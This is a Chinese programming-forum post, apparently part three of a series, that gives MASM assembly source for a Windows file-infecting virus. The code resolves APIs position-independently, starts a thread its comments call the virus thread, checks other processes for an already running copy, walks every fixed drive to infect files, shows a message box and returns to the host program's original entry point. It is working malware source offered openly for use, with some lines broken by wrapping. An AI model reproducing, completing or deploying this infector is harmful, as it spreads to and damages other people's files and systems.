网页资讯视频图片知道文库贴吧地图采购
进入贴吧全吧搜索
编程吧 关注:371,135贴子:1,631,847
  • 2回复贴,共1

代码第三部分


;*************************
代码重定位
*************************************
call @F
@@:
pop ebx
sub ebx,offset @B
;****************************************************************************
invoke _GetKernelBase,[esp] ;获取Kernel32.dll基址
mov [ebx + hDllKernel32], eax
lea eax, [ebx + szGetProcAddress]
invoke _GetAPIByName, [ebx +
hDllKernel32],eax ;获取 GetProcAddress的地址
mov [ebx + _GetProcAddress], eax
lea eax, [ebx + szLoadLibrary]
invoke [ebx + _GetProcAddress], [ebx +
hDllKernel32], eax; 获取 LoadLibrary的地址
mov [ebx + _LoadLibrary], eax
lea eax, [ebx + szUser32]
invoke [ebx + _LoadLibrary], eax ; 获取 User32.DLL的基址
mov [ebx + hDllUser32], eax
;******************* 循环获取API(在User32.dll) ***********************
pushad
lea esi, [ebx + szMessageBox]
lea edi, [ebx + _MessageBox]
.while TRUE
invoke [ebx + _GetProcAddress], [ebx
+ hDllUser32], esi
.if !eax
; invoke [ebx + _MessageBox], NULL,
esi, NULL, MB_OK
.endif
mov [edi], eax
add edi, 4
xor eax, eax
@@:
lodsb ;使esi移动到下一个API的字符串
or ax, ax
jnz @B
.break .if ! byte ptr [esi] ;新的API字符串是不是 0
.endw
popad
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;******************* 循环获取API(在Kernel.dll) ***********************
pushad
lea esi, [ebx + szExitProcess]
lea edi, [ebx + _ExitProcess]
.while TRUE
invoke [ebx + _GetProcAddress], [ebx
+ hDllKernel32], esi
.if !eax
; invoke [ebx + _MessageBox], NULL,
esi, NULL, MB_OK
.endif
mov [edi], eax
add edi, 4
xor eax, eax
@@:
lodsb ;使esi移动到下一个API的字符串
or ax, ax
jnz @B
.break .if ! byte ptr [esi] ;新的API字符串是不是 0
.endw
popad
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
lea eax, [ebx + _VirusThread]
invoke [ebx + _CreateThread], NULL, 0,
eax, 0, 0, 0 ;创建新的线程
I



jmp _ToOldEntry
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;关于_dwAlign 对齐
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Align proc _dwSize, _dwAlign
push edx
mov eax, _dwSize
xor edx, edx
div _dwAlign ;除于 _dwAlign,
eax ->商, edx ->余数
.if edx ;如果有余数
inc eax ;商 + 1
.endif
mul _dwAlign ;乘于 _dwAlign
-> 对齐
pop edx
ret
_Align
endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;*******************************
病毒执行的代码
********************************
_VirusThread proc uses ebx edi esi lParam
;病毒的线程
LOCAL @dwTemp
LOCAL @hSnapshot
LOCAL @stProcess32:PROCESSENTRY32
LOCAL @lpPEHeaderInfo[1024]:byte
LOCAL @dwDriveNum
;********************* 代码重定位 **************************
call @F
@@:
pop ebx
sub ebx,offset @B
;***********************************************************
;**************** 在内存中扫描病毒是否启动 *****************
mov @stProcess32.dwSize, sizeof
PROCESSENTRY32
invoke [ebx + _Create32Snapshot],
TH32CS_SNAPPROCESS, 0 ;进程快照
.if eax
mov @hSnapshot, eax
invoke [ebx + _Process32First],
@hSnapshot, addr @stProcess32
.repeat
call [ebx + _GetCurrentProcessId]
.if @stProcess32.th32ProcessID != eax
invoke [ebx + _ReadProcessMemory],
@stProcess32.th32ProcessID, 00400000H,\
addr @lpPEHeaderInfo, 1024, addr
@dwTemp
lea esi, @lpPEHeaderInfo
assume esi: ptr IMAGE_DOS_HEADER
add esi, [esi].e_lfanew
assume esi: ptr IMAGE_NT_HEADERS
movzx ecx, [esi].FileHeader.NumberOfSections
;内存程序节的个数
mov @dwTemp, ecx
add esi, sizeof IMAGE_NT_HEADERS ;节表
assume esi: ptr IMAGE_SECTION_HEADER
.while ecx
push eax
lea eax, [ebx + szSectionName1]
invoke [ebx + _lstrcmp], addr
[esi].Name1 , eax;
.if !eax
ret
.endif
add esi, sizeof IMAGE_SECTION_HEADER
dec @dwTemp
mov ecx, @dwTemp
pop eax
.endw
.endif
invoke [ebx + _Process32Next],
@hSnapshot, addr @stProcess32
.until eax == FALSE
.endif
;***********************************************************
;*********************** 感染其他文件 **********************
lea eax, [ebx + szBuffer]
invoke [ebx + _GetDriveStrings], 4*26,
eax
lea esi, [ebx + szBuffer ]
.repeat
invoke [ebx + _GetDriveType], esi
.if eax == DRIVE_FIXED
mov byte ptr [esi + 2], 0
invoke _FindFile1, esi
.endif
add esi, 4
.until !byte ptr[esi]
;***********************************************************
;********************** 病毒的功能 *************************
lea eax, [ebx + offset szMsgCaption1]
lea ecx, [ebx + offset szMsgText1]
invoke [ebx + _MessageBox], NULL, ecx,
eax, NULL
;***********************************************************
_Ret:
ret
_VirusThread endp


扫二维码下载贴吧客户端

下载贴吧APP
看高清直播、视频!
  • 2回复贴,共1
分享到: